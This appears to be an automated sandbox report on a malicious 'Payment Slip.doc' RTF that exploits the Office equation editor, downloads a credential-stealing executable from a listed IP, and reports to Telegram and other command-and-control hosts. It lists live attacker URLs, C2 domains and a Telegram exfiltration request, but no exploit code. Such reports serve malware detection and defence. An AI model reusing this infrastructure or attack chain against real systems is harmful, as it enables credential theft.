                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		14
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		Logon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Query Registry                  		SMB/Windows Admin Shares1
                  Screen Capture                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Install Root Certificate                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model1
                  Email Collection                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing                  		LSA Secrets31
                  Virtualization/Sandbox Evasion                  		SSH1
                  Input Capture                  		24
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync1
                  Remote System Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry                  		Proc Filesystem1
                  System Network Configuration Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1519173 Sample: Payment Slip.doc Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 46 Initial sample is an obfuscated RTF file 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 25 other signatures 2->52 8 WINWORD.EXE 291 18 2->8         started        process3 process4 10 EQNEDT32.EXE 11 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 36 66.63.187.123, 49161, 80 ASN-QUADRANET-GLOBALUS United States 10->36 26 C:\Users\user\...\vvndewepeter91026.exe, PE32 10->26 dropped 28 C:\Users\user\...\LLnsOpxxAnmWi[1].exe, PE32 10->28 dropped 64 Office equation editor establishes network connection 10->64 66 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->66 17 vvndewepeter91026.exe 3 10->17         started        file6 signatures7 process8 signatures9 38 Antivirus detection for dropped file 17->38 40 Machine Learning detection for dropped file 17->40 42 Adds a directory exclusion to Windows Defender 17->42 44 Injects a PE file into a foreign processes 17->44 20 vvndewepeter91026.exe 12 2 17->20         started        24 powershell.exe 4 17->24         started        process10 dnsIp11 30 reallyfreegeoip.org 20->30 32 api.telegram.org 20->32 34 9 other IPs or domains 20->34 54 Installs new ROOT certificates 20->54 56 Tries to steal Mail credentials (via file / registry access) 20->56 58 Tries to harvest and steal browser information (history, passwords, etc) 20->58 signatures12 60 Tries to detect the country of the analysis system (by using the IP) 30->60 62 Uses the Telegram API (likely for C&C communication) 32->62

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Payment Slip.doc45%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                  Payment Slip.doc100%AviraHEUR/Rtf.Malformed

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\vvndewepeter91026.exe100%AviraHEUR/AGEN.1308792
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\LLnsOpxxAnmWi[1].exe100%AviraHEUR/AGEN.1308792
                  C:\Users\user\AppData\Roaming\vvndewepeter91026.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\LLnsOpxxAnmWi[1].exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://varders.kozow.com:80810%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  http://aborters.duckdns.org:8081100%URL Reputationmalware
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  http://anotherarmy.dns.army:8081100%URL Reputationmalware
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                  https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                  http://66.63.187.123/txt/LLnsOpxxAnmWi.exerrC:0%Avira URL Cloudsafe
                  https://api.telegram.org/bot0%Avira URL Cloudsafe
                  https://api.telegram.org0%Avira URL Cloudsafe
                  http://reallyfreegeoip.org0%Avira URL Cloudsafe
                  http://www.diginotar.nl/cps/pkioverheid00%Avira URL Cloudsafe
                  http://checkip.dyndns.com0%Avira URL Cloudsafe
                  https://reallyfreegeoip.org/xml/8.46.123.3340%Avira URL Cloudsafe
                  https://www.google.com/search?q=wmf0%Avira URL Cloudsafe
                  http://ocsp.entrust.net0D0%Avira URL Cloudsafe
                  https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i0%Avira URL Cloudsafe
                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%Avira URL Cloudsafe
                  http://crl.entrust.net/server1.crl00%Avira URL Cloudsafe
                  http://66.63.187.123/txt/LLnsOpxxAnmWi.exej0%Avira URL Cloudsafe
                  https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
                  https://www.google.com/favicon.ico0%Avira URL Cloudsafe
                  http://66.63.187.123/txt/LLnsOpxxAnmWi.exeC:0%Avira URL Cloudsafe
                  http://66.63.187.123/txt/LLnsOpxxAnmWi.exe0%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                  http://66.63.187.123/txt/LLnsOpxxAnmWi.exea0%Avira URL Cloudsafe
                  https://www.google.com/sorry/index0%Avira URL Cloudsafe
                  http://66.63.187.123/txt/LLnsOpxxAnmWi.exee0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                  https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a0%Avira URL Cloudsafe
                  https://www.google.com/search?q=net0%Avira URL Cloudsafe
                  https://www.google.com/sorry/indextest0%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a0%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%209/26/2024%20/%204:38:32%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                  http://api.telegram.org0%Avira URL Cloudsafe
                  https://secure.comodo.com/CPS00%Avira URL Cloudsafe
                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		188.114.96.3
                  		truetrue
                    		unknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrue
                      		unknown
                      checkip.dyndns.com
                      		132.226.8.169
                      		truefalse
                        		unknown
                        checkip.dyndns.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.org/false
                          • URL Reputation: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33false
                          • Avira URL Cloud: safe
                          		unknown
                          http://66.63.187.123/txt/LLnsOpxxAnmWi.exetrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%209/26/2024%20/%204:38:32%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabvvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmfvvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.orgvvndewepeter91026.exe, 00000008.00000002.913786371.000000000250A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/botvvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002502000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.entrust.net03vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://66.63.187.123/txt/LLnsOpxxAnmWi.exerrC:EQNEDT32.EXE, 00000002.00000002.397052134.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diginotar.nl/cps/pkioverheid0vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.334vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024B7000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002495000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024F3000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002487000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002437000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024A4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://varders.kozow.com:8081vvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.google.com/search?q=wmfvvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.org/qvvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://reallyfreegeoip.orgvvndewepeter91026.exe, 00000008.00000002.913786371.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000240C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024B7000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002495000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024F3000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002487000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024A4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.comvvndewepeter91026.exe, 00000008.00000002.913786371.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024B7000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002495000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000023F4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024F3000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002487000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024A4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.entrust.net0Dvvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevvndewepeter91026.exe, 00000005.00000002.405973235.0000000002547000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/vvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000023F4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.entrust.net/server1.crl0vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&ivvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://checkip.dyndns.orgvvndewepeter91026.exe, 00000008.00000002.913786371.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024B7000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002495000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000023F4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024F3000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002487000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002437000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000023E8000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024A4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchvvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002502000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/favicon.icovvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://66.63.187.123/txt/LLnsOpxxAnmWi.exeC:EQNEDT32.EXE, 00000002.00000002.397052134.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://aborters.duckdns.org:8081vvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          https://ac.ecosia.org/autocomplete?q=vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://66.63.187.123/txt/LLnsOpxxAnmWi.exejEQNEDT32.EXE, 00000002.00000002.397052134.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/sorry/indexvvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003521000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://anotherarmy.dns.army:8081vvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          http://66.63.187.123/txt/LLnsOpxxAnmWi.exeaEQNEDT32.EXE, 00000002.00000002.397052134.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://66.63.187.123/txt/LLnsOpxxAnmWi.exeeEQNEDT32.EXE, 00000002.00000002.397052134.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.orgvvndewepeter91026.exe, 00000008.00000002.913786371.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024B7000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002495000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000023F4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024F3000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002487000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002437000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024A4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20avvndewepeter91026.exe, 00000008.00000002.913786371.000000000250A000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002502000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26avvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/search?q=netvvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/sorry/indextestvvndewepeter91026.exe, 00000008.00000002.914618854.00000000034B2000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.000000000347A000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003566000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003458000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.000000000352E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.000000000350C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://api.telegram.orgvvndewepeter91026.exe, 00000008.00000002.913786371.000000000250A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://secure.comodo.com/CPS0vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.entrust.net/2048ca.crl0vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
